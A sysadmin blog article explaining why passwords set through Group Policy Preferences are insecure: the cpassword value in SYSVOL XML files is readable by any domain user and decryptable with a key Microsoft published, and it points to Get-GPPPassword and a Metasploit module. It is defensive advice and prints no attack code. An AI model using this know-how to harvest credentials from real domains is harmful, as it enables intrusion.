Windows OS Hub
  • Windows Server
    • Windows Server 2016
    • Windows Server 2012 R2
    • Windows Server 2012
    • Windows Server 2008 R2
    • SCCM
  • Active Directory
    • Group Policies
  • Windows Clients
    • Windows 10
    • Windows 8
    • Windows 7
    • MS Office
    • Outlook
  • Virtualization
    • VMWare
    • Hyper-V
  • PowerShell
  • Exchange
  • Home
  • About

Windows OS Hub

  • Windows Server
    • Windows Server 2016
    • Windows Server 2012 R2
    • Windows Server 2012
    • Windows Server 2008 R2
    • SCCM
  • Active Directory
    • Group Policies
  • Windows Clients
    • Windows 10
    • Windows 8
    • Windows 7
    • MS Office
    • Outlook
  • Virtualization
    • VMWare
    • Hyper-V
  • PowerShell
  • Exchange

 Windows OS Hub / Active Directory / Password Security with Group Policy Preferences

May 14, 2014 Active Directory

Password Security with Group Policy Preferences

Group Policy Preferences (GPP) is a powerful Windows group policy extension that makes setting and management of the park of computers easier and is a sort of substitution to different scripts in GPO. One of the GPP opportunities is to manage passwords of local and service accounts widely used by many administrators, who even have no idea of this technology being insecure. In this article we will explain why you shouldn’t use the password management features of Group Policy Preferences.

There are 5 different policies that allow to set a user/administrator password in Group Policy Preferences.

  • Local users and groups – with GPP, an administrator can create/change a local account and set its password (this policy is quite often used to change the password of the local administrator on all corporate PCs)  set local user password with Group Policy Preferences
  • Drive Maps – GPP allow the user to connect a drive map with the definite user name and passwordMap network drive  with Group Policy Preferences
  • Data sources – when creating a data source, you can set a user name and a password for the account to connect from.
  • Windows Scheduled Tasks – scheduled tasks can be run from a certain user account
  • Services – GPP allow to specify an account and its password from which a certain service is run (instead of Local System account).start service with specific user in Group Policy Preferences

After the administrator saves the password in any of the GPPs listed above, it is stored in a special XML file in the corresponding GPO directory and later — in the domain controllers in the SYSVOL folder. The password is stored encrypted in the XML file, but to cipher/decipher the password, a very unstable symmetric algorithm AES 32 is used (it is recognized by Microsoft itself).

Suppose, the administrator has set the policy that changes the local administrator password on all PCs using the GPP. Then the system saves the encrypted password in the file groups.xml in the GPO directory. Let’s see what this file contains (in our example this file is stored in the \\woshub.com\SYSVOL\woshub.com\Policies\{POLICY_ID}\Machine\Preferences\Groups directory).

Important. All authorized domain users have read-access to the files stored in the GPO. It means that any user can view your encrypted password.

encrypted password stored in gpo xml file

The encrypted password is the value of the CPASSWORD field. The most interesting is that Microsoft has published a 32-bit AES key used to encrypt the password in MSDN (http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx#endNote2)

32 byte AES key for encrypt passwords in GPP

So, anyone can write a script that allows to decrypt the password that is stored in the XML file (the AES algorithm is symmetric and the encryption key makes it possible to get a source text easily).

Note. You can download a script to decipher a password stored in the GPP here: Get-GPPPassword. Obviously, we upload this file for reference only and it must not be used for lucrative purposes.  

Microsoft developers have added the warning of the insecurity of this way to store passwords in Windows Server 2012 / Windows Server 2012 R2. When trying to specify the password with the GPP, the following warning appears:

This password is stored as part of the GPO in SYSOL and is discoverable, although obscured.

This password is stored as part of the GPO in SYSOL and is discoverable, although obscured.

It is also important to note that the MetaSploit module of obtaining and decrypting passwords stored in the GPP exists since 2012. It means that hackers can implement this attack vector almost automatically.

So, will you go on using Group Policy Preferences to manage passwords?

0 comment
0
Facebook Twitter Google + Pinterest
previous post
Exchange 2013 Database Recovery
next post
HP ILO Management Using PowerShell

Related Reading

Configuring Proxy Settings on Windows Using Group Policy...

February 17, 2021

Updating Group Policy Settings on Windows Domain Computers

February 16, 2021

How to Find Inactive Computers and Users in...

January 29, 2021

Checking User Logon History in Active Directory Domain...

January 22, 2021

Restoring Deleted Active Directory Objects/Users

December 21, 2020

Leave a Comment Cancel Reply

Categories

  • Active Directory
  • Group Policies
  • Exchange
  • Windows 10
  • Windows 8
  • Windows 7
  • Windows Server 2016
  • Windows Server 2012 R2
  • Windows Server 2008 R2
  • PowerShell
  • VMWare
  • MS Office

Recent Posts

  • How to Sign a PowerShell Script (PS1) with a Code Signing Certificate?

    February 25, 2021
  • Change the Default Port Number (TCP/1433) for a MS SQL Server Instance

    February 24, 2021
  • How to Shadow (Remote Control) a User’s RDP session on RDS Windows Server 2016/2019?

    February 22, 2021
  • Configuring PowerShell Script Execution Policy

    February 18, 2021
  • Configuring Proxy Settings on Windows Using Group Policy Preferences

    February 17, 2021
  • Updating Group Policy Settings on Windows Domain Computers

    February 16, 2021
  • Managing Administrative Shares (Admin$, IPC$, C$, D$) in Windows 10

    February 11, 2021
  • Packet Monitor (PktMon) – Built-in Packet Sniffer in Windows 10

    February 10, 2021
  • Fixing “Winload.efi is Missing or Contains Errors” in Windows 10

    February 5, 2021
  • How to Move (Clone) Windows to a New Hard Drive (HDD/SSD)?

    February 4, 2021

Follow us

woshub.com
  • Facebook
  • Twitter
  • RSS
Popular Posts
  • Additional Account Info Tab in AD Users And Computers Console
  • How Automatically Fill Computer Description Field in Active Directory
  • Configuring Network Devices Authentication using Active Directory
  • Kerberos Token Size and Issues of Its Growth
  • Active Directory: Managed Service Accounts
  • Java Settings Management with Group Policies
Footer Logo

@2014 - 2018 - Windows OS Hub. All about operating systems for sysadmins


Back To Top